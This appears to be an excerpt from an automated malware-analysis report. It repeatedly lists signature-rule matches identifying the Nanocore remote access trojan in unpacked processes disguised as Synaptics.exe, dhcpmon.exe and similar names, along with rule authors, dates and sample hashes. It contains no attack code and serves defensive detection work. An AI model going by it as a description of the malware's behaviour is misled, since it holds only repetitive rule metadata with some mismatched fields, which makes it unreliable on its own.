            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.4f70000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.4f70000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
